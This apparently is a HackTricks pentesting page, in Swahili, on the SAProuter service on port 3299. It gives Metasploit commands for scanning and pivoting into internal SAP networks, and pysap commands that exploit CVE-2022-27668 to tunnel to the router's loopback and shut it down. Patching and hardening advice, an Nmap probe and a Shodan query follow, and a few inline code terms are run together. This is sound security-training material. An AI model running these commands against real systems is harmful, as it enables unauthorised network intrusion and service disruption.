HackTricks# 3299/tcp - Pentesting SAProuter
Reading time: 7 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
PORT STATE SERVICE VERSION
3299/tcp open saprouter?
Hii ni muhtasari wa chapisho kutoka https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/
Kuelewa Kupenya SAProuter kwa Metasploit
SAProuter inafanya kazi kama proxy ya nyuma kwa mifumo ya SAP, hasa kudhibiti ufikiaji kati ya mtandao wa intaneti na mitandao ya ndani ya SAP. Mara nyingi inakabiliwa na intaneti kwa kuruhusu bandari ya TCP 3299 kupitia moto wa shirika. Mpangilio huu unafanya SAProuter kuwa lengo la kuvutia kwa pentesting kwa sababu inaweza kutumikia kama lango la mitandao ya ndani yenye thamani kubwa.
Kuchanganua na Kukusanya Taarifa
Kwanza, uchanganuzi unafanywa ili kubaini kama router ya SAP inafanya kazi kwenye IP fulani kwa kutumia moduli ya sap_service_discovery. Hatua hii ni muhimu kwa kuanzisha uwepo wa router ya SAP na bandari yake iliyo wazi.
msf> use auxiliary/scanner/sap/sap_service_discovery
msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101
msf auxiliary(sap_service_discovery) > run
Baada ya kugundua, uchunguzi zaidi wa usanidi wa SAP router unafanywa kwa kutumia moduli ya sap_router_info_request ili kuweza kufichua maelezo ya mtandao wa ndani.
msf auxiliary(sap_router_info_request) > use auxiliary/scanner/sap/sap_router_info_request
msf auxiliary(sap_router_info_request) > set RHOSTS 1.2.3.101
msf auxiliary(sap_router_info_request) > run
Kuhesabu Huduma za Ndani
Kwa kutumia maarifa ya mtandao wa ndani yaliyopatikana, moduli ya sap_router_portscanner inatumika kuchunguza mwenyeji wa ndani na huduma kupitia SAProuter, ikiruhusu kuelewa kwa undani mitandao ya ndani na usanidi wa huduma.
msf auxiliary(sap_router_portscanner) > set INSTANCES 00-50
msf auxiliary(sap_router_portscanner) > set PORTS 32NN
Moduli huu una uwezo wa kubadilika katika kulenga mifano maalum ya SAP na bandari, na hivyo kuwa chombo chenye ufanisi kwa uchunguzi wa kina wa mtandao wa ndani.
Uhesabu wa Juu na Ramani za ACL
Kuchunguza zaidi kunaweza kufichua jinsi Orodha za Udhibiti wa Ufikiaji (ACLs) zilivyowekwa kwenye SAProuter, zikielezea ni muunganisho gani unaruhusiwa au kuzuia. Taarifa hii ni muhimu katika kuelewa sera za usalama na uwezekano wa udhaifu.
msf auxiliary(sap_router_portscanner) > set MODE TCP
msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN
Blind Enumeration of Internal Hosts
Katika hali ambapo taarifa za moja kwa moja kutoka kwa SAProuter ni chache, mbinu kama vile blind enumeration zinaweza kutumika. Njia hii inajaribu kukisia na kuthibitisha uwepo wa majina ya ndani ya mwenyeji, ikifunua malengo yanayoweza bila anwani za IP za moja kwa moja.
Leveraging Information for Penetration Testing
Baada ya kuchora ramani ya mtandao na kubaini huduma zinazopatikana, wapimaji wa penetration wanaweza kutumia uwezo wa proxy wa Metasploit kuhamasisha kupitia SAProuter kwa ajili ya uchunguzi zaidi na unyakuzi wa huduma za ndani za SAP.
msf auxiliary(sap_hostctrl_getcomputersystem) > set Proxies sapni:1.2.3.101:3299
msf auxiliary(sap_hostctrl_getcomputersystem) > set RHOSTS 192.168.1.18
msf auxiliary(sap_hostctrl_getcomputersystem) > run
Hitimisho
Mbinu hii inaonyesha umuhimu wa usanidi salama wa SAProuter na inasisitiza uwezekano wa kufikia mitandao ya ndani kupitia upimaji wa penetration ulioelekezwa. Kuweka salama SAP routers na kuelewa jukumu lao katika usanifu wa usalama wa mtandao ni muhimu kwa kulinda dhidi ya ufikiaji usioidhinishwa.
Kwa maelezo zaidi kuhusu moduli za Metasploit na matumizi yake, tembelea Rapid7's database.
Uthibitisho wa Hivi Karibuni (2022-2025)
CVE-2022-27668 – Udhibiti Mbaya wa Ufikiaji ➜ Utendaji wa Amri ya Utawala wa Kijijini
Mnamo Juni 2022, SAP ilitoa Kumbukumbu ya Usalama 3158375 inayoshughulikia kasoro muhimu (CVSS 9.8) katika SAProuter (kernels zote ≥ 7.22). Mshambuliaji asiye na uthibitisho anaweza kutumia entries za saprouttab zenye ruhusa kupita kiasi ili kutuma pakiti za usimamizi (mfano shutdown, trace-level, connection-kill) kutoka kwa mwenyeji wa mbali, hata wakati router ilizinduliwa bila chaguo la -X remote-admin.
Tatizo hili linatokana na uwezekano wa kujenga tunnel kwa interface ya loopback ya router kwa kulenga anwani isiyoelezwa 0.0.0.0. Mara tunnel inapoundwa, mshambuliaji anapata haki za mwenyeji wa ndani na anaweza kuendesha amri yoyote ya usimamizi.
Utekelezaji wa vitendo unaweza kurudiwa kwa kutumia mfumo wa pysap:
# 1. Build a loopback tunnel through the vulnerable SAProuter
python router_portfw.py -d <ROUTER_IP> -p 3299 \
-t 0.0.0.0 -r 3299 \
-a 127.0.0.1 -l 3299 -v
# 2. Send an admin packet (here: stop the remote router)
python router_admin.py -s -d 127.0.0.1 -p 3299
Tofauti zilizokumbwa
- SAProuter 7.22 / 7.53 pekee
- Kernel 7.49, 7.77, 7.81, 7.85–7.88 (ikiwemo KRNL64NUC/UC)
Suluhisho / Kupunguza
- Tumia patch iliyotolewa na SAP Note 3158375.
- Ondoa malengo ya wildcard (
*) kutoka kwenye mistari yaPnaSkatikasaprouttab. - Hakikisha router inaanza bila chaguo la
-Xna haifichuliwi moja kwa moja kwenye Mtandao.
Zana & Hila Zilizosasishwa
- pysap – inatunzwa kwa ufanisi na inatoa
router_portfw.py,router_admin.py&router_trace.pykwa ajili ya kuunda pakiti za NI/Router za kawaida, fuzzing ACLs au kuendesha exploit ya CVE-2022-27668. - Nmap – panua ugunduzi wa huduma kwa kuongeza probe ya SAProuter ya kawaida:
Probe TCP SAProuter q|\x00\x00\x00\x00|
ports 3299
match saprouter m|SAProuter ([\d.]+)| p/SAProuter/ v/$1/
Patanisha na scripts za NSE au --script=banner ili kutambua haraka toleo zinazovuja mfuatano wa banner (SAProuter <ver> on '<host>').
- Metasploit – moduli za ziada zilizoonyeshwa hapo juu bado zinafanya kazi kupitia SOCKS au NI proxy iliyoundwa na pysap, ikiruhusu ujumuishaji kamili wa mfumo hata wakati router inazuia ufikiaji wa moja kwa moja.
Orodha ya Kuimarisha & Kugundua
- Chuja bandari 3299/TCP kwenye firewall ya pembejeo – ruhusu trafiki tu kutoka kwenye mitandao ya SAP support iliyoaminika.
- Hifadhi SAProuter imepatishwa kikamilifu; thibitisha kwa
saprouter -vna kulinganisha na kiwango cha hivi karibuni cha patch ya kernel. - Tumia kiri, maalum kwa mwenyeji katika
saprouttab; epuka wildcards*na kataa sheria zaP/Szinazolenga wenyeji au bandari zisizo za kawaida. - Anza huduma na
-S <secudir>+ SNC ili kutekeleza usimbaji na uthibitishaji wa pamoja. - Zima usimamizi wa mbali (
-X) na, ikiwa inawezekana, fungamanisha msikilizaji na127.0.0.1wakati ukitumia proxy ya nyuma ya nje kwa trafiki inayohitajika. - Fuata logi ya dev_rout kwa pakiti za
ROUTER_ADMzinazoshuku au maombi yasiyotarajiwa yaNI_ROUTEkwa0.0.0.0.
Marejeo
- https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/
- https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/
Shodan
port:3299 !HTTP Network packet too big
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.